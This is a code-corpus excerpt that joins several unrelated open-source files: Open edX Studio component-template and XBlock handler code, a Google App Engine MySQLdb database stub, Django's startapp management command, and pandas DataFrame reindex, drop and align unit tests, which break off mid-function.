boilerplate_name = advanced_problem_type['boilerplate_name']
try:
component_display_name = xblock_type_display_name(component)
except PluginMissingError:
log.warning('Unable to load xblock type %s to read display_name', component, exc_info=True)
else:
templates_for_category.append(
create_template_dict(component_display_name, component, boilerplate_name, 'advanced')
)
categories.add(component)
component_templates.append({
"type": category,
"templates": templates_for_category,
"display_name": component_display_names[category]
})
# Libraries do not support advanced components at this time.
if library:
return component_templates
# Check if there are any advanced modules specified in the course policy.
# These modules should be specified as a list of strings, where the strings
# are the names of the modules in ADVANCED_COMPONENT_TYPES that should be
# enabled for the course.
course_advanced_keys = courselike.advanced_modules
advanced_component_templates = {"type": "advanced", "templates": [], "display_name": _("Advanced")}
advanced_component_types = _advanced_component_types()
# Set component types according to course policy file
if isinstance(course_advanced_keys, list):
for category in course_advanced_keys:
if category in advanced_component_types and category not in categories:
# boilerplates not supported for advanced components
try:
component_display_name = xblock_type_display_name(category, default_display_name=category)
advanced_component_templates['templates'].append(
create_template_dict(
component_display_name,
category
)
)
categories.add(category)
except PluginMissingError:
# dhm: I got this once but it can happen any time the
# course author configures an advanced component which does
# not exist on the server. This code here merely
# prevents any authors from trying to instantiate the
# non-existent component type by not showing it in the menu
log.warning(
"Advanced component %s does not exist. It will not be added to the Studio new component menu.",
category
)
else:
log.error(
"Improper format for course advanced keys! %s",
course_advanced_keys
)
if len(advanced_component_templates['templates']) > 0:
component_templates.insert(0, advanced_component_templates)
return component_templates
@login_required
def _get_item_in_course(request, usage_key):
"""
Helper method for getting the old location, containing course,
item, lms_link, and preview_lms_link for a given locator.
Verifies that the caller has permission to access this item.
"""
# usage_key's course_key may have an empty run property
usage_key = usage_key.replace(course_key=modulestore().fill_in_run(usage_key.course_key))
course_key = usage_key.course_key
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course = modulestore().get_course(course_key)
item = modulestore().get_item(usage_key, depth=1)
lms_link = get_lms_link_for_item(item.location)
preview_lms_link = get_lms_link_for_item(item.location, preview=True)
return course, item, lms_link, preview_lms_link
@login_required
def component_handler(request, usage_key_string, handler, suffix=''):
    """
    Dispatch an AJAX action to an xblock

    Args:
        request: The django request object
        usage_key_string (str): The usage-id of the block to dispatch to
        handler (str): The handler to execute
        suffix (str): The remainder of the url to be passed to the handler

    Returns:
        :class:`django.http.HttpResponse`: The response from the handler, converted to a
            django response
    """
    usage_key = UsageKey.from_string(usage_key_string)

    descriptor = modulestore().get_item(usage_key)
    # Let the module handle the AJAX
    req = django_to_webob_request(request)

    try:
        resp = descriptor.handle(handler, req, suffix)
    except NoSuchHandlerError:
        log.info("XBlock %s attempted to access missing handler %r", descriptor, handler, exc_info=True)
        raise Http404

    # unintentional update to handle any side effects of handle call
    # could potentially be updating actual course data or simply caching its values
    modulestore().update_item(descriptor, request.user.id)

    return webob_to_django_response(resp)
| agpl-3.0 |
GdZ/scriptfile | software/googleAppEngine/google/appengine/api/rdbms_mysqldb.py | 5 | 2957 | #!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Relational database API stub that uses the MySQLdb DB-API library.
Also see the rdbms module.
"""
import logging
import os
# Common filesystem paths where a local MySQL server's Unix domain socket
# may live; scanned in order by FindUnixSocket().
_POTENTIAL_SOCKET_LOCATIONS = (
    '/tmp/mysql.sock',
    '/var/run/mysqld/mysqld.sock',
    '/var/lib/mysql/mysql.sock',
    '/var/run/mysql/mysql.sock',
    '/var/mysql/mysql.sock',
)

# Default keyword arguments merged into every connect() call; populated via
# SetConnectKwargs().
_connect_kwargs = {}
def SetConnectKwargs(**kwargs):
    """Store the keyword args (host, user, etc) to pass to MySQLdb.connect()."""
    global _connect_kwargs
    # Take a copy so later mutation of the caller's mapping cannot leak in.
    _connect_kwargs = {key: value for key, value in kwargs.items()}
def FindUnixSocket():
    """Find the Unix socket for MySQL by scanning some known locations.

    Returns:
      If found, the path to the Unix socket, otherwise, None.
    """
    # First existing candidate wins; None when no location exists.
    return next(
        (candidate for candidate in _POTENTIAL_SOCKET_LOCATIONS
         if os.path.exists(candidate)),
        None)
# Import MySQLdb if it is available; otherwise install a stub connect()
# that raises a helpful error.  The `import google` presumably ensures the
# SDK's package paths are set up before third-party imports — NOTE(review):
# confirm against the surrounding SDK bootstrap.
try:
    import google

    import MySQLdb
    from MySQLdb import *
    # Load MySQLdb.constants as a side effect so its submodule is importable
    # by callers of this module.
    __import__('MySQLdb.constants', globals(), locals(), ['*'])
except ImportError:
    logging.warning('The rdbms API is not available because the MySQLdb '
                    'library could not be loaded.')

    def connect(instance=None, database=None):
        # Stub used when MySQLdb is missing: any connection attempt fails
        # with installation instructions.
        raise NotImplementedError(
            'Unable to find the MySQLdb library. Please see the SDK '
            'documentation for installation instructions.')
else:
    def connect(instance=None, database=None, **kwargs):
        # Merge precedence (lowest to highest): module-level defaults set via
        # SetConnectKwargs(), the `database` argument, then per-call kwargs.
        merged_kwargs = _connect_kwargs.copy()
        if database:
            merged_kwargs['db'] = database
        merged_kwargs.update(kwargs)
        # MySQLdb spells the password keyword 'passwd'.
        if 'password' in merged_kwargs:
            merged_kwargs['passwd'] = merged_kwargs.pop('password')
        # For local connections without an explicit socket, try to discover
        # the MySQL Unix socket automatically.
        host = merged_kwargs.get('host')
        if ((not host or host == 'localhost') and
                not merged_kwargs.get('unix_socket')):
            socket = FindUnixSocket()
            if socket:
                merged_kwargs['unix_socket'] = socket
            else:
                logging.warning(
                    'Unable to find MySQL socket file. Use --mysql_socket to '
                    'specify its location manually.')
        logging.info('Connecting to MySQL with kwargs %r', merged_kwargs)
        try:
            return MySQLdb.connect(**merged_kwargs)
        except MySQLdb.Error:
            logging.critical(
                'MySQL connection failed! Ensure that you have provided correct '
                'values for the --mysql_* flags when running dev_appserver.py')
            raise
def set_instance(instance):
    """No-op in dev_appserver; merely logs that the call was ignored."""
    message = 'set_instance() is a noop in dev_appserver.'
    logging.info(message)
| mit |
yask123/django | django/core/management/commands/startapp.py | 513 | 1040 | from importlib import import_module
from django.core.management.base import CommandError
from django.core.management.templates import TemplateCommand
class Command(TemplateCommand):
    """Management command that scaffolds a new Django application."""

    help = ("Creates a Django app directory structure for the given app "
            "name in the current directory or optionally in the given "
            "directory.")
    missing_args_message = "You must provide an application name."

    def handle(self, **options):
        app_name = options.pop('name')
        target = options.pop('directory')
        self.validate_name(app_name, "app")

        # Refuse names that shadow an importable Python module (EAFP probe).
        try:
            import_module(app_name)
        except ImportError:
            pass
        else:
            raise CommandError("%r conflicts with the name of an existing "
                               "Python module and cannot be used as an app "
                               "name. Please try another name." % app_name)

        super(Command, self).handle('app', app_name, target, **options)
| bsd-3-clause |
GuessWhoSamFoo/pandas | pandas/tests/frame/test_axis_select_reindex.py | 1 | 44950 | # -*- coding: utf-8 -*-
from __future__ import print_function
from datetime import datetime
import numpy as np
import pytest
from pandas.compat import lrange, lzip, u
from pandas.errors import PerformanceWarning
import pandas as pd
from pandas import (
Categorical, DataFrame, Index, MultiIndex, Series, compat, date_range,
isna)
from pandas.tests.frame.common import TestData
import pandas.util.testing as tm
from pandas.util.testing import assert_frame_equal
class TestDataFrameSelectReindex(TestData):
# These are specific reindex-based tests; other indexing tests should go in
# test_indexing
    def test_drop_names(self):
        """drop() keeps axis names, for both returned copies and inplace."""
        df = DataFrame([[1, 2, 3], [3, 4, 5], [5, 6, 7]],
                       index=['a', 'b', 'c'],
                       columns=['d', 'e', 'f'])
        df.index.name, df.columns.name = 'first', 'second'
        df_dropped_b = df.drop('b')
        df_dropped_e = df.drop('e', axis=1)
        df_inplace_b, df_inplace_e = df.copy(), df.copy()
        df_inplace_b.drop('b', inplace=True)
        df_inplace_e.drop('e', axis=1, inplace=True)
        for obj in (df_dropped_b, df_dropped_e, df_inplace_b, df_inplace_e):
            assert obj.index.name == 'first'
            assert obj.columns.name == 'second'
        assert list(df.columns) == ['d', 'e', 'f']

        pytest.raises(KeyError, df.drop, ['g'])
        pytest.raises(KeyError, df.drop, ['g'], 1)

        # errors = 'ignore'
        dropped = df.drop(['g'], errors='ignore')
        expected = Index(['a', 'b', 'c'], name='first')
        tm.assert_index_equal(dropped.index, expected)

        dropped = df.drop(['b', 'g'], errors='ignore')
        expected = Index(['a', 'c'], name='first')
        tm.assert_index_equal(dropped.index, expected)

        dropped = df.drop(['g'], axis=1, errors='ignore')
        expected = Index(['d', 'e', 'f'], name='second')
        tm.assert_index_equal(dropped.columns, expected)

        dropped = df.drop(['d', 'g'], axis=1, errors='ignore')
        expected = Index(['e', 'f'], name='second')
        tm.assert_index_equal(dropped.columns, expected)

        # GH 16398
        dropped = df.drop([], errors='ignore')
        expected = Index(['a', 'b', 'c'], name='first')
        tm.assert_index_equal(dropped.index, expected)
    def test_drop_col_still_multiindex(self):
        """Deleting one column leaves the columns as a MultiIndex."""
        arrays = [['a', 'b', 'c', 'top'],
                  ['', '', '', 'OD'],
                  ['', '', '', 'wx']]

        tuples = sorted(zip(*arrays))
        index = MultiIndex.from_tuples(tuples)

        df = DataFrame(np.random.randn(3, 4), columns=index)
        del df[('a', '', '')]
        assert(isinstance(df.columns, MultiIndex))
    def test_drop(self):
        """drop() by label on both axes: errors='ignore', dup labels, inplace."""
        simple = DataFrame({"A": [1, 2, 3, 4], "B": [0, 1, 2, 3]})
        assert_frame_equal(simple.drop("A", axis=1), simple[['B']])
        assert_frame_equal(simple.drop(["A", "B"], axis='columns'),
                           simple[[]])
        assert_frame_equal(simple.drop([0, 1, 3], axis=0), simple.loc[[2], :])
        assert_frame_equal(simple.drop(
            [0, 3], axis='index'), simple.loc[[1, 2], :])

        pytest.raises(KeyError, simple.drop, 5)
        pytest.raises(KeyError, simple.drop, 'C', 1)
        pytest.raises(KeyError, simple.drop, [1, 5])
        pytest.raises(KeyError, simple.drop, ['A', 'C'], 1)

        # errors = 'ignore'
        assert_frame_equal(simple.drop(5, errors='ignore'), simple)
        assert_frame_equal(simple.drop([0, 5], errors='ignore'),
                           simple.loc[[1, 2, 3], :])
        assert_frame_equal(simple.drop('C', axis=1, errors='ignore'), simple)
        assert_frame_equal(simple.drop(['A', 'C'], axis=1, errors='ignore'),
                           simple[['B']])

        # non-unique - wheee!
        nu_df = DataFrame(lzip(range(3), range(-3, 1), list('abc')),
                          columns=['a', 'a', 'b'])
        assert_frame_equal(nu_df.drop('a', axis=1), nu_df[['b']])
        assert_frame_equal(nu_df.drop('b', axis='columns'), nu_df['a'])
        assert_frame_equal(nu_df.drop([]), nu_df)  # GH 16398

        nu_df = nu_df.set_index(pd.Index(['X', 'Y', 'X']))
        nu_df.columns = list('abc')
        assert_frame_equal(nu_df.drop('X', axis='rows'), nu_df.loc[["Y"], :])
        assert_frame_equal(nu_df.drop(['X', 'Y'], axis=0), nu_df.loc[[], :])

        # inplace cache issue
        # GH 5628
        df = pd.DataFrame(np.random.randn(10, 3), columns=list('abc'))
        expected = df[~(df.b > 0)]
        df.drop(labels=df[df.b > 0].index, inplace=True)
        assert_frame_equal(df, expected)
    def test_drop_multiindex_not_lexsorted(self):
        """drop() agrees between lexsorted and non-lexsorted MI columns."""
        # GH 11640

        # define the lexsorted version
        lexsorted_mi = MultiIndex.from_tuples(
            [('a', ''), ('b1', 'c1'), ('b2', 'c2')], names=['b', 'c'])
        lexsorted_df = DataFrame([[1, 3, 4]], columns=lexsorted_mi)
        assert lexsorted_df.columns.is_lexsorted()

        # define the non-lexsorted version
        not_lexsorted_df = DataFrame(columns=['a', 'b', 'c', 'd'],
                                     data=[[1, 'b1', 'c1', 3],
                                           [1, 'b2', 'c2', 4]])
        not_lexsorted_df = not_lexsorted_df.pivot_table(
            index='a', columns=['b', 'c'], values='d')
        not_lexsorted_df = not_lexsorted_df.reset_index()
        assert not not_lexsorted_df.columns.is_lexsorted()

        # compare the results
        tm.assert_frame_equal(lexsorted_df, not_lexsorted_df)

        expected = lexsorted_df.drop('a', axis=1)
        with tm.assert_produces_warning(PerformanceWarning):
            result = not_lexsorted_df.drop('a', axis=1)

        tm.assert_frame_equal(result, expected)
    def test_drop_api_equivalence(self):
        """labels/axis and index/columns spellings of drop() are equivalent."""
        # equivalence of the labels/axis and index/columns API's (GH12392)
        df = DataFrame([[1, 2, 3], [3, 4, 5], [5, 6, 7]],
                       index=['a', 'b', 'c'],
                       columns=['d', 'e', 'f'])

        res1 = df.drop('a')
        res2 = df.drop(index='a')
        tm.assert_frame_equal(res1, res2)

        res1 = df.drop('d', 1)
        res2 = df.drop(columns='d')
        tm.assert_frame_equal(res1, res2)

        res1 = df.drop(labels='e', axis=1)
        res2 = df.drop(columns='e')
        tm.assert_frame_equal(res1, res2)

        res1 = df.drop(['a'], axis=0)
        res2 = df.drop(index=['a'])
        tm.assert_frame_equal(res1, res2)

        res1 = df.drop(['a'], axis=0).drop(['d'], axis=1)
        res2 = df.drop(index=['a'], columns=['d'])
        tm.assert_frame_equal(res1, res2)

        with pytest.raises(ValueError):
            df.drop(labels='a', index='b')

        with pytest.raises(ValueError):
            df.drop(labels='a', columns='b')

        with pytest.raises(ValueError):
            df.drop(axis=1)
    def test_merge_join_different_levels(self):
        """merge/join across frames whose columns have different nlevels."""
        # GH 9455

        # first dataframe
        df1 = DataFrame(columns=['a', 'b'], data=[[1, 11], [0, 22]])

        # second dataframe
        columns = MultiIndex.from_tuples([('a', ''), ('c', 'c1')])
        df2 = DataFrame(columns=columns, data=[[1, 33], [0, 44]])

        # merge
        columns = ['a', 'b', ('c', 'c1')]
        expected = DataFrame(columns=columns, data=[[1, 11, 33], [0, 22, 44]])
        with tm.assert_produces_warning(UserWarning):
            result = pd.merge(df1, df2, on='a')
        tm.assert_frame_equal(result, expected)

        # join, see discussion in GH 12219
        columns = ['a', 'b', ('a', ''), ('c', 'c1')]
        expected = DataFrame(columns=columns,
                             data=[[1, 11, 0, 44], [0, 22, 1, 33]])
        with tm.assert_produces_warning(UserWarning):
            result = df1.join(df2, on='a')
        tm.assert_frame_equal(result, expected)
    def test_reindex(self):
        """Basic reindex: alignment, NaN fill, corner cases, copy semantics."""
        newFrame = self.frame.reindex(self.ts1.index)

        for col in newFrame.columns:
            for idx, val in compat.iteritems(newFrame[col]):
                if idx in self.frame.index:
                    if np.isnan(val):
                        assert np.isnan(self.frame[col][idx])
                    else:
                        assert val == self.frame[col][idx]
                else:
                    assert np.isnan(val)

        for col, series in compat.iteritems(newFrame):
            assert tm.equalContents(series.index, newFrame.index)
        emptyFrame = self.frame.reindex(Index([]))
        assert len(emptyFrame.index) == 0

        # Cython code should be unit-tested directly
        nonContigFrame = self.frame.reindex(self.ts1.index[::2])

        for col in nonContigFrame.columns:
            for idx, val in compat.iteritems(nonContigFrame[col]):
                if idx in self.frame.index:
                    if np.isnan(val):
                        assert np.isnan(self.frame[col][idx])
                    else:
                        assert val == self.frame[col][idx]
                else:
                    assert np.isnan(val)

        for col, series in compat.iteritems(nonContigFrame):
            assert tm.equalContents(series.index, nonContigFrame.index)

        # corner cases

        # Same index, copies values but not index if copy=False
        newFrame = self.frame.reindex(self.frame.index, copy=False)
        assert newFrame.index is self.frame.index

        # length zero
        newFrame = self.frame.reindex([])
        assert newFrame.empty
        assert len(newFrame.columns) == len(self.frame.columns)

        # length zero with columns reindexed with non-empty index
        newFrame = self.frame.reindex([])
        newFrame = newFrame.reindex(self.frame.index)
        assert len(newFrame.index) == len(self.frame.index)
        assert len(newFrame.columns) == len(self.frame.columns)

        # pass non-Index
        newFrame = self.frame.reindex(list(self.ts1.index))
        tm.assert_index_equal(newFrame.index, self.ts1.index)

        # copy with no axes
        result = self.frame.reindex()
        assert_frame_equal(result, self.frame)
        assert result is not self.frame
    def test_reindex_nan(self):
        """Reindexing with NaN labels in the target index (GH10388)."""
        df = pd.DataFrame([[1, 2], [3, 5], [7, 11], [9, 23]],
                          index=[2, np.nan, 1, 5],
                          columns=['joe', 'jim'])

        i, j = [np.nan, 5, 5, np.nan, 1, 2, np.nan], [1, 3, 3, 1, 2, 0, 1]
        assert_frame_equal(df.reindex(i), df.iloc[j])

        df.index = df.index.astype('object')
        assert_frame_equal(df.reindex(i), df.iloc[j], check_index_type=False)

        # GH10388
        df = pd.DataFrame({'other': ['a', 'b', np.nan, 'c'],
                           'date': ['2015-03-22', np.nan,
                                    '2012-01-08', np.nan],
                           'amount': [2, 3, 4, 5]})

        df['date'] = pd.to_datetime(df.date)
        df['delta'] = (pd.to_datetime('2015-06-18') - df['date']).shift(1)

        left = df.set_index(['delta', 'other', 'date']).reset_index()
        right = df.reindex(columns=['delta', 'other', 'date', 'amount'])
        assert_frame_equal(left, right)
    def test_reindex_name_remains(self):
        """Index/columns names survive reindexing with a named indexer."""
        s = Series(np.random.rand(10))
        df = DataFrame(s, index=np.arange(len(s)))
        i = Series(np.arange(10), name='iname')

        df = df.reindex(i)
        assert df.index.name == 'iname'

        df = df.reindex(Index(np.arange(10), name='tmpname'))
        assert df.index.name == 'tmpname'

        s = Series(np.random.rand(10))
        df = DataFrame(s.T, index=np.arange(len(s)))
        i = Series(np.arange(10), name='iname')
        df = df.reindex(columns=i)
        assert df.columns.name == 'iname'
    def test_reindex_int(self):
        """int64 kept when no NaNs are introduced; upcast to float otherwise."""
        smaller = self.intframe.reindex(self.intframe.index[::2])

        assert smaller['A'].dtype == np.int64

        bigger = smaller.reindex(self.intframe.index)
        assert bigger['A'].dtype == np.float64

        smaller = self.intframe.reindex(columns=['A', 'B'])
        assert smaller['A'].dtype == np.int64
    def test_reindex_like(self):
        """reindex_like(other) matches reindexing with other's labels."""
        other = self.frame.reindex(index=self.frame.index[:10],
                                   columns=['C', 'B'])

        assert_frame_equal(other, self.frame.reindex_like(other))
    def test_reindex_columns(self):
        """Column reindexing adds NaN columns and drops missing ones."""
        new_frame = self.frame.reindex(columns=['A', 'B', 'E'])

        tm.assert_series_equal(new_frame['B'], self.frame['B'])
        assert np.isnan(new_frame['E']).all()
        assert 'C' not in new_frame

        # Length zero
        new_frame = self.frame.reindex(columns=[])
        assert new_frame.empty
    def test_reindex_columns_method(self):
        """method= is honored when reindexing over columns (GH 14992)."""
        # GH 14992, reindexing over columns ignored method
        df = DataFrame(data=[[11, 12, 13], [21, 22, 23], [31, 32, 33]],
                       index=[1, 2, 4],
                       columns=[1, 2, 4],
                       dtype=float)

        # default method
        result = df.reindex(columns=range(6))
        expected = DataFrame(data=[[np.nan, 11, 12, np.nan, 13, np.nan],
                                   [np.nan, 21, 22, np.nan, 23, np.nan],
                                   [np.nan, 31, 32, np.nan, 33, np.nan]],
                             index=[1, 2, 4],
                             columns=range(6),
                             dtype=float)
        assert_frame_equal(result, expected)

        # method='ffill'
        result = df.reindex(columns=range(6), method='ffill')
        expected = DataFrame(data=[[np.nan, 11, 12, 12, 13, 13],
                                   [np.nan, 21, 22, 22, 23, 23],
                                   [np.nan, 31, 32, 32, 33, 33]],
                             index=[1, 2, 4],
                             columns=range(6),
                             dtype=float)
        assert_frame_equal(result, expected)

        # method='bfill'
        result = df.reindex(columns=range(6), method='bfill')
        expected = DataFrame(data=[[11, 11, 12, 13, 13, np.nan],
                                   [21, 21, 22, 23, 23, np.nan],
                                   [31, 31, 32, 33, 33, np.nan]],
                             index=[1, 2, 4],
                             columns=range(6),
                             dtype=float)
        assert_frame_equal(result, expected)
    def test_reindex_axes(self):
        """Reindexing both axes keeps the DatetimeIndex freq (GH 3317)."""
        # GH 3317, reindexing by both axes loses freq of the index
        df = DataFrame(np.ones((3, 3)),
                       index=[datetime(2012, 1, 1),
                              datetime(2012, 1, 2),
                              datetime(2012, 1, 3)],
                       columns=['a', 'b', 'c'])
        time_freq = date_range('2012-01-01', '2012-01-03', freq='d')
        some_cols = ['a', 'b']

        index_freq = df.reindex(index=time_freq).index.freq
        both_freq = df.reindex(index=time_freq, columns=some_cols).index.freq
        seq_freq = df.reindex(index=time_freq).reindex(
            columns=some_cols).index.freq
        assert index_freq == both_freq
        assert index_freq == seq_freq
    def test_reindex_fill_value(self):
        """fill_value= on both axes, plus the deprecated reindex_axis path."""
        df = DataFrame(np.random.randn(10, 4))

        # axis=0
        result = df.reindex(lrange(15))
        assert np.isnan(result.values[-5:]).all()

        result = df.reindex(lrange(15), fill_value=0)
        expected = df.reindex(lrange(15)).fillna(0)
        assert_frame_equal(result, expected)

        # axis=1
        result = df.reindex(columns=lrange(5), fill_value=0.)
        expected = df.copy()
        expected[4] = 0.
        assert_frame_equal(result, expected)

        result = df.reindex(columns=lrange(5), fill_value=0)
        expected = df.copy()
        expected[4] = 0
        assert_frame_equal(result, expected)

        result = df.reindex(columns=lrange(5), fill_value='foo')
        expected = df.copy()
        expected[4] = 'foo'
        assert_frame_equal(result, expected)

        # reindex_axis
        with tm.assert_produces_warning(FutureWarning):
            result = df.reindex_axis(lrange(15), fill_value=0., axis=0)
        expected = df.reindex(lrange(15)).fillna(0)
        assert_frame_equal(result, expected)

        with tm.assert_produces_warning(FutureWarning):
            result = df.reindex_axis(lrange(5), fill_value=0., axis=1)
        expected = df.reindex(columns=lrange(5)).fillna(0)
        assert_frame_equal(result, expected)

        # other dtypes
        df['foo'] = 'foo'
        result = df.reindex(lrange(15), fill_value=0)
        expected = df.reindex(lrange(15)).fillna(0)
        assert_frame_equal(result, expected)
    def test_reindex_dups(self):
        """Reindexing a duplicate index raises; assigning a new index is fine."""
        # GH4746, reindex on duplicate index error messages
        arr = np.random.randn(10)
        df = DataFrame(arr, index=[1, 2, 3, 4, 5, 1, 2, 3, 4, 5])

        # set index is ok
        result = df.copy()
        result.index = list(range(len(df)))
        expected = DataFrame(arr, index=list(range(len(df))))
        assert_frame_equal(result, expected)

        # reindex fails
        pytest.raises(ValueError, df.reindex, index=list(range(len(df))))
    def test_reindex_axis_style(self):
        """Positional labels with axis=0/'index' match index= reindexing."""
        # https://github.com/pandas-dev/pandas/issues/12392
        df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
        expected = pd.DataFrame({"A": [1, 2, np.nan], "B": [4, 5, np.nan]},
                                index=[0, 1, 3])
        result = df.reindex([0, 1, 3])
        assert_frame_equal(result, expected)

        result = df.reindex([0, 1, 3], axis=0)
        assert_frame_equal(result, expected)

        result = df.reindex([0, 1, 3], axis='index')
        assert_frame_equal(result, expected)
    def test_reindex_positional_warns(self):
        """Two positional reindex args warn (deprecated) but still work."""
        # https://github.com/pandas-dev/pandas/issues/12392
        df = pd.DataFrame({"A": [1, 2, 3], "B": [4, 5, 6]})
        expected = pd.DataFrame({"A": [1., 2], 'B': [4., 5],
                                 "C": [np.nan, np.nan]})
        with tm.assert_produces_warning(FutureWarning):
            result = df.reindex([0, 1], ['A', 'B', 'C'])

        assert_frame_equal(result, expected)
    def test_reindex_axis_style_raises(self):
        """Mixing axis= with index=/columns= or positional labels raises."""
        # https://github.com/pandas-dev/pandas/issues/12392
        df = pd.DataFrame({"A": [1, 2, 3], 'B': [4, 5, 6]})
        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex([0, 1], ['A'], axis=1)

        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex([0, 1], ['A'], axis='index')

        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex(index=[0, 1], axis='index')

        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex(index=[0, 1], axis='columns')

        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex(columns=[0, 1], axis='columns')

        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex(index=[0, 1], columns=[0, 1], axis='columns')

        with pytest.raises(TypeError, match='Cannot specify all'):
            df.reindex([0, 1], [0], ['A'])

        # Mixing styles
        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex(index=[0, 1], axis='index')

        with pytest.raises(TypeError, match="Cannot specify both 'axis'"):
            df.reindex(index=[0, 1], axis='columns')

        # Duplicates
        with pytest.raises(TypeError, match="multiple values"):
            df.reindex([0, 1], labels=[0, 1])
    def test_reindex_single_named_indexer(self):
        """Positional index labels combine with the columns= keyword."""
        # https://github.com/pandas-dev/pandas/issues/12392
        df = pd.DataFrame({"A": [1, 2, 3], "B": [1, 2, 3]})
        result = df.reindex([0, 1], columns=['A'])
        expected = pd.DataFrame({"A": [1, 2]})
        assert_frame_equal(result, expected)
    def test_reindex_api_equivalence(self):
        """labels/axis and index/columns spellings of reindex() are equivalent."""
        # https://github.com/pandas-dev/pandas/issues/12392
        # equivalence of the labels/axis and index/columns API's
        df = DataFrame([[1, 2, 3], [3, 4, 5], [5, 6, 7]],
                       index=['a', 'b', 'c'],
                       columns=['d', 'e', 'f'])

        res1 = df.reindex(['b', 'a'])
        res2 = df.reindex(index=['b', 'a'])
        res3 = df.reindex(labels=['b', 'a'])
        res4 = df.reindex(labels=['b', 'a'], axis=0)
        res5 = df.reindex(['b', 'a'], axis=0)
        for res in [res2, res3, res4, res5]:
            tm.assert_frame_equal(res1, res)

        res1 = df.reindex(columns=['e', 'd'])
        res2 = df.reindex(['e', 'd'], axis=1)
        res3 = df.reindex(labels=['e', 'd'], axis=1)
        for res in [res2, res3]:
            tm.assert_frame_equal(res1, res)

        with tm.assert_produces_warning(FutureWarning) as m:
            res1 = df.reindex(['b', 'a'], ['e', 'd'])
        assert 'reindex' in str(m[0].message)
        res2 = df.reindex(columns=['e', 'd'], index=['b', 'a'])
        res3 = df.reindex(labels=['b', 'a'], axis=0).reindex(labels=['e', 'd'],
                                                             axis=1)
        for res in [res2, res3]:
            tm.assert_frame_equal(res1, res)
    def test_align(self):
        """align() across joins, axes, fill values, and frame/Series cases."""
        af, bf = self.frame.align(self.frame)
        assert af._data is not self.frame._data

        af, bf = self.frame.align(self.frame, copy=False)
        assert af._data is self.frame._data

        # axis = 0
        other = self.frame.iloc[:-5, :3]
        af, bf = self.frame.align(other, axis=0, fill_value=-1)

        tm.assert_index_equal(bf.columns, other.columns)

        # test fill value
        join_idx = self.frame.index.join(other.index)
        diff_a = self.frame.index.difference(join_idx)
        diff_b = other.index.difference(join_idx)
        diff_a_vals = af.reindex(diff_a).values
        diff_b_vals = bf.reindex(diff_b).values
        assert (diff_a_vals == -1).all()

        af, bf = self.frame.align(other, join='right', axis=0)
        tm.assert_index_equal(bf.columns, other.columns)
        tm.assert_index_equal(bf.index, other.index)
        tm.assert_index_equal(af.index, other.index)

        # axis = 1
        other = self.frame.iloc[:-5, :3].copy()
        af, bf = self.frame.align(other, axis=1)
        tm.assert_index_equal(bf.columns, self.frame.columns)
        tm.assert_index_equal(bf.index, other.index)

        # test fill value
        join_idx = self.frame.index.join(other.index)
        diff_a = self.frame.index.difference(join_idx)
        diff_b = other.index.difference(join_idx)
        diff_a_vals = af.reindex(diff_a).values

        # TODO(wesm): unused?
        diff_b_vals = bf.reindex(diff_b).values  # noqa

        assert (diff_a_vals == -1).all()

        af, bf = self.frame.align(other, join='inner', axis=1)
        tm.assert_index_equal(bf.columns, other.columns)

        af, bf = self.frame.align(other, join='inner', axis=1, method='pad')
        tm.assert_index_equal(bf.columns, other.columns)

        # test other non-float types
        af, bf = self.intframe.align(other, join='inner', axis=1, method='pad')
        tm.assert_index_equal(bf.columns, other.columns)

        af, bf = self.mixed_frame.align(self.mixed_frame,
                                        join='inner', axis=1, method='pad')
        tm.assert_index_equal(bf.columns, self.mixed_frame.columns)

        af, bf = self.frame.align(other.iloc[:, 0], join='inner', axis=1,
                                  method=None, fill_value=None)
        tm.assert_index_equal(bf.index, Index([]))

        af, bf = self.frame.align(other.iloc[:, 0], join='inner', axis=1,
                                  method=None, fill_value=0)
        tm.assert_index_equal(bf.index, Index([]))

        # mixed floats/ints
        af, bf = self.mixed_float.align(other.iloc[:, 0], join='inner', axis=1,
                                        method=None, fill_value=0)
        tm.assert_index_equal(bf.index, Index([]))

        af, bf = self.mixed_int.align(other.iloc[:, 0], join='inner', axis=1,
                                      method=None, fill_value=0)
        tm.assert_index_equal(bf.index, Index([]))

        # Try to align DataFrame to Series along bad axis
        with pytest.raises(ValueError):
            self.frame.align(af.iloc[0, :3], join='inner', axis=2)

        # align dataframe to series with broadcast or not
        idx = self.frame.index
        s = Series(range(len(idx)), index=idx)

        left, right = self.frame.align(s, axis=0)
        tm.assert_index_equal(left.index, self.frame.index)
        tm.assert_index_equal(right.index, self.frame.index)
        assert isinstance(right, Series)

        left, right = self.frame.align(s, broadcast_axis=1)
        tm.assert_index_equal(left.index, self.frame.index)
        expected = {c: s for c in self.frame.columns}
        expected = DataFrame(expected, index=self.frame.index,
                             columns=self.frame.columns)
        tm.assert_frame_equal(right, expected)

        # see gh-9558
        df = DataFrame({'a': [1, 2, 3], 'b': [4, 5, 6]})
        result = df[df['a'] == 2]
        expected = DataFrame([[2, 5]], index=[1], columns=['a', 'b'])
        tm.assert_frame_equal(result, expected)

        result = df.where(df['a'] == 2, 0)
        expected = DataFrame({'a': [0, 2, 0], 'b': [0, 5, 0]})
        tm.assert_frame_equal(result, expected)
    def _check_align(self, a, b, axis, fill_axis, how, method, limit=None):
        """Align a with b and compare against a manual reindex+fillna."""
        aa, ab = a.align(b, axis=axis, join=how, method=method, limit=limit,
                         fill_axis=fill_axis)

        join_index, join_columns = None, None

        ea, eb = a, b
        if axis is None or axis == 0:
            join_index = a.index.join(b.index, how=how)
            ea = ea.reindex(index=join_index)
            eb = eb.reindex(index=join_index)

        if axis is None or axis == 1:
            join_columns = a.columns.join(b.columns, how=how)
